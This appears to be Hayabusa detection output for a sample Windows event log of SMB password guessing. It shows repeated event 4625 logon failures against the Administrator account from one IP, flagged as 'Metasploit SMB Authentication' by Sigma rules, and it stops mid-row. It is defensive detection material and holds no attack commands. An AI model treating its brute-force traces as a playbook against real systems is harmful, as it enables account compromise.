Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1ilRmhSB5RfvpVa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PuQ47GGBraimypWL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UfUsAYWilbwMScpE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.504 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.554 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 22ZSltGNwIl0DNDM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.554 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.595 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IYwG9IUpdk5DmM8w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.595 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4a8kbGxQFHDBodGF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.644 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KoLqIaO8p3k9kOkj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.685 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rUnonSx3ZBdkyGhu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d1QJziwKhsaJljGV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.772 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZhcNRrpODYB9jZxs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.807 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yi5JE53caVn7n54w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.852 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Jx6qTASzFp830ud6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.885 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b4L8HtBWlmAMTjCf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F4hVfTwibHreepku : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.966 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3TlapK211UT8SO0W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.012 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.059 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mzzw3uPkn2cgtmlF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.059 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aPnfUjwJei5E5BD7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.092 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mm1k0eeKAYokIbDg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.133 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w8TDNcJ3LMyNtUe1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.166 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ogKKslkdXvc9f130 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sgoy6gMfe5N0UiP5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lfjf3d6I8TsBOzvc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.289 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vs8DG8s81oOwYoI7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LFkgN1aDoYkQ4qrT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.427 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.459 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KMwLokYpcFIYHegd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.459 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.507 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6oKradBV4ERsQnKs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.507 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0qPzlzfmgrbYTKqQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.549 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qKYlBm2lhobHzbjh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DBMu96oqO9tb3f4O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.623 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tO04Q3eYdzyuy51v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.664 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FrIa2UrSrfdhkDCx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: axhhyMrGl95O16Vg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.741 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.783 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: atjvfi8QeEDluhL2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.783 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.827 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9HPBZKUiiKeyQwSr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.827 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2SmitfyjO4mxqw5E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.872 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nrq1g8ktTQbPTXqn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.904 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 943GV3t1muba5IQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.947 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.982 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HPVd28zf85AxdGqd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:16.982 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D6evoSSxcKkHspuc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.023 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C4fznmrnIdUH7DzG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.099 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AwrrYjUV41P0K5Jh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.099 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z4RBZrALEnH5BKP9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LU6uWH4gs4iHP7rV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.192 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hCfhZDAH8ufk77zN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.237 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TE9pw4UeRldGeKVc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z8PKE05MqxE5TwXT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.312 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GIE5fmddOPBbCM3u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:17.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 